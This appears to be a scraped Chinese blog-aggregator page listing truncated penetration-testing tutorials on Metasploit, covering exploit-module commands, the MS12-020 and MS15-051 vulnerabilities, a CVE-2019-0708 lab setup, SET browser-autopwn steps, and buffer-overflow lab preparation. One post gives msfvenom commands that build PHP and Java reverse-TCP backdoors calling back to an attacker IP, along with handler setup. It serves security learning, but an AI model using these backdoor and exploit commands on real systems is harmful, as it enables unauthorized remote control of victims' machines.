metasploit

Metasploit工具----漏洞利用模块

匿名 (未验证) 提交于 2019-12-02 23:57:01
漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。 每个操作系统都会存在各种Bug,想Windows这样有版权的操作系统,微软公司会很快的开发针对这些Bug的补丁供用户更新。全世界有大量的漏洞研究人员夜以继日的发现、研究新的Bug,这些没有公布补丁的Bug就是所谓的0day,0day对网络安全的威胁是巨大的。 metasploit常用漏洞利用命令: search <name> # 用指定关键字搜索可利用模块 use <exploit name> # 使用漏洞 show options # 显示可配置参数 set <OPTION NAME> <option> # 设置选项 show payloads # 显示可利用攻击载荷 下面以MS12-020漏洞来演示漏洞利用模块的使用。 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,MS12-020漏洞利用: 本机:kali 192.168.2.135 靶机:windows 2003 192.168.2.134 首先搜索可利用模块。 search ms12 - 020 这里选择

[后渗透]Metasploit使用基础

匿名 (未验证) 提交于 2019-12-02 23:52:01
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 首先配置下MSF的数据库:可提升查询攻击模块的速度,以及利用速度 1.1 进入到msf,查询数据库连接情况:发现默认情况下并未连接数据库 $msf> db_status 1.2 配置数据库: $service postgres enable $service postgres start $msfdb init 1.3 看到上面的配置文件的提示,就可以通过文件地址,查看连接密码: $cat /usr/share/metasploit-framework/config/database.yml 1.4 知道密码后,再次进入msf,通过db_connect 查询如何写连接的命令: 1.5 再用用账号密码去连,最后 db_stause 查询下状态,发现连接正常 MSF的命名规则:模块

OSCP Learning Notes - Exploit(4)

匿名 (未验证) 提交于 2019-12-02 23:47:01
Client Side Attacks Tool: setoolkit 1. Start setoolkit on Kali Linux. setoolkit 2. Select 1) Social-Engineering Attacks 3. Select 2)Website Attack Vectors. 4. Select 2) Metasploit Browser Exploit Method 5.Select 2)Site Cloner and set the options. 6.Select 46) Metasploit Browser Autopwn 8. Enter the IP/URL of attender's server.

Metasploit Framework(1)基本命令、简单使用

匿名 (未验证) 提交于 2019-12-02 21:53:52
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 基本的控制台命令介绍: banner 查看metasploit的基本信息 connect 这里理解成kali的nc命令,基本一致 简单使用下: show 列出各种各样的模块,后边会经常使用 search 顾名思义,搜索,比如我搜索一个微软的漏洞,显示的是文件目录 (/usr/share/metasploit-framework/.....) 可以过滤性地搜索 不只有name筛选,还有类型type,平台platform等(-h可以看看都可以搜哪些) use 使用模块的命令:比如我下面使用著名的ms08-067 接下来就可以输入一些特定模块的特定的命令 比如:show options,show targets,这些具体在后面介绍 数据库方面的操作: db_status:查看是否连接到数据库,如果失败的话重启下 db_disconnect:断开数据库连接(通常用不着) db_connect:连接其他数据库 db_rebuild_cache:开启数据库缓存任务(后边如果用到数据库的东西,可以更快速调用) db_nmap:其实和Nmap命令一致,不过会把扫描结果存入数据库 db_export:导出数据库,-f参数:保存格式,后边接路径 使用:db

ms15-051提权

笑着哭i 提交于 2019-11-29 15:01:55
ms15-051提权 实验概述   Metasploit是一款开源的渗透测试工具,可以帮助安全员发现漏洞问题,此工具带有的攻击模块可以帮助安全员简单的利用相关的漏洞,本实验通过Metasploit对内网机器进行渗透,并且使用ms15-051进行权限提升获取window server 2003的system权限,最后进行远程控制。 实验目的   1、熟练metasploit的使用方法   2、学会msfvenom命令的基本格式   3、了解ms15-051漏洞 实验原理   Metasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞、攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metasploit框架可以从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击。所有这些操作都可以通过Metasploit的Web界面进行管理,而它只是其中一种种管理接口,另外还有命令行工具和一些商业工具等等。攻击者可以将来漏洞扫描程序的结果导入到Metasploit框架的开源安全工具Armitage中,然后通过Metasploit的模块来确定漏洞。一旦发现了漏洞,攻击者就可以采取一种可行方法攻击系统,通过Shell或启动Metasploit的meterpreter来控制这个系统

Reproduction CVE_2019_0708

梦想与她 提交于 2019-11-29 11:30:12
Ax_Preparation windows 7 SP1 Download: ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/ VMware Workstation pro 15 Download: https://my.vmware.com/cn/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation_pro/15_0 Metasploit 5.x Download: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers linux parrot Download: https://parrotlinux.org/download-security.php CVE-2019-0708 exploit tools: wget https://github.com/rapid7/metasploit-framework/edb7e0221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/explot/rdp.rb

Metasploit工具----漏洞利用模块

折月煮酒 提交于 2019-11-29 04:57:52
漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。 每个操作系统都会存在各种Bug,想Windows这样有版权的操作系统,微软公司会很快的开发针对这些Bug的补丁供用户更新。全世界有大量的漏洞研究人员夜以继日的发现、研究新的Bug,这些没有公布补丁的Bug就是所谓的0day,0day对网络安全的威胁是巨大的。 metasploit常用漏洞利用命令: search <name> # 用指定关键字搜索可利用模块 use <exploit name> # 使用漏洞 show options # 显示可配置参数 set <OPTION NAME> <option> # 设置选项 show payloads # 显示可利用攻击载荷 下面以MS12-020漏洞来演示漏洞利用模块的使用。 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,MS12-020漏洞利用: 本机:kali 192.168.2.135 靶机:windows 2003 192.168.2.134 首先搜索可利用模块。 search ms12-020 这里选择

Metasploit工具----扫描模块

喜夏-厌秋 提交于 2019-11-29 03:27:42
Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,他是有Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。几乎所有流行的操作系统都支持Metasploit框架而且Metasploit框架在这些操作系统上的工作流程基本都一样。 本文主要介绍一下辅助模块的使用: Auxiliaries(辅助模块): 该模块不会直接在测试者和目标主机之间建立访问,他们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。 这里我们用扫描端口来演示: 首先看看扫描端口有哪些模块: search portscan 这里使用auxiliary/scanner/portscan/syn 这个模块(这个比较快,方便演示): use auxiliary/scanner/portscan/syn 然后我们需要配置参数: show options PS: 后面为‘yes’的是必须配置的或者说必须有值的。 set rhosts 192.168.2.135 # 设置目标ip(也可以是网段,192.168.1.0/24) set ports 135-139,445,80,8080 # 设置扫描的端口 set threads 100 # 设置线程为100 输入‘run’运行: 我们还可以使用其他特定扫描: use

Metasploit后门渗透Linux系统以及跨平台后门生成

可紊 提交于 2019-11-28 19:28:22
Metasploit后门渗透Linux系统以及跨平台后门生成 Metasploit后门渗透Linux系统以及跨平台后门生成 1. 2.PHP后门生成 3.JAVA后门生成 4.LINUX后门生成 TOC 1. 2.PHP后门生成 1.示例指令: msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php LHOST:攻击者IP PHP后门代码 2.配置 Metasploit , exploit 监听 search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序) use exploit/multi/handler // 使用模块 show options // 配置 set LHOST 192.168.73.131 set payload php/meterpreter/reverse_tcp // 设置测试的载荷 exploit // 监听 php后门使用 3.JAVA后门生成 1.示例指令 msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar 2.配置 Metasploit , exploit

缓冲区溢出实例(一)--Windows

不羁的心 提交于 2019-11-28 06:16:38
一、基本概念 缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。 在Windows XP或2k3 server中的SLMail 5.5.0 Mail Server程序的POP3 PASS命令存在缓冲区溢出漏洞,无需身份验证实现远程代码执行。 注意,Win7以上系统的防范机制可有效防止该缓冲区漏洞的利用: DEP:阻止代码从数据页被执行; ASLR:随机内存地址加载执行程序和DLL,每次重启地址变化。 二、实验环境准备: SLMail 5.5.0 Mail Server ImmunityDebugger_1_85_setup.exe mona.py 下载地址: https://slmail.software.informer.com/download/ https://www.softpedia.com/get/Programming/Debuggers-Decompilers-Dissasemblers/Immunity-Debugger.shtml https://github.com/corelan/mona mona手册 https://www.corelan.be/index.php/2011/07/14/mona-py-the